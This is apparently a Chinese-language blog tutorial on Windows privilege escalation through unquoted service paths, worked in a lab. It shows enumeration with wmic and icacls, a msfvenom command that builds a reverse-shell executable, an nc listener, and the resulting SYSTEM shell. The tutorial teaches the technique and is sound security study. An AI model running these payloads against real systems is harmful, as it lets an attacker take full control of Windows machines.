17. Windows 提權(Services)

16th鐵人賽

Eugene

2024-10-01 20:31:12

137 瀏覽

分享至

說明

有些服務路徑包含空格，並且沒有使用雙引號，這個情況下Windows會先找與路徑前面符合的程式，導致被駭客放置惡意程式取代正常程式被啟動，原理可以看底下這篇

Windows 提權(1)-Unquoted Service Paths、修改服務提權-飛飛
https://ithelp.ithome.com.tw/articles/10281870

作法

參照這篇文章建立一個有弱點的環境
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/UnquotedServicePath.md

Enumeration

列出所有不在 C:\Windows\ 路徑下且啟動模式為auto，並且不顯示任何帶雙引號的服務

C:\Users\Administrator>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Vuln Service 1                                                                      Vulnerable Service 1                       
C:\Program Files\Vulnerable Service1\Service 1.exe             
Auto

查看資料夾權限，BUILTIN這使用者有寫入的權限，如果剛好為駭客取得權限得帳號，就可以放置惡意程式

C:\Users\Administrator>icacls "C:\Program Files\Vulnerable Service1"
C:\Program Files\Vulnerable Service1 BUILTIN\Users:(W)
                                     NT SERVICE\TrustedInstaller:(I)(F)
                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)

Exploitation

用msfvenom建一個Reverse Shell惡意程式，被啟動後會向指定的主機報到，把Service.exe複製到"C:\Program Files\Vulnerable Service1"路徑下

msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > Service.exe

於要接收Reverse Shell的主機建立nc 監聽

nc -lvp 1234

因為Service啟動模式為auto，開機時會啟動，這邊直接下指令執行服務重啟，重新啟動後Service.exe被執行了
，接收主機收到cmd

kali@attacker01:~$ nc -lvp 1234        
listening on [any] 1234 ...
192.168.217.10: inverse host lookup failed: Unknown host
connect to [192.168.217.50] from (UNKNOWN) [192.168.217.10] 52170
Microsoft Windows [Version 10.0.19044.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system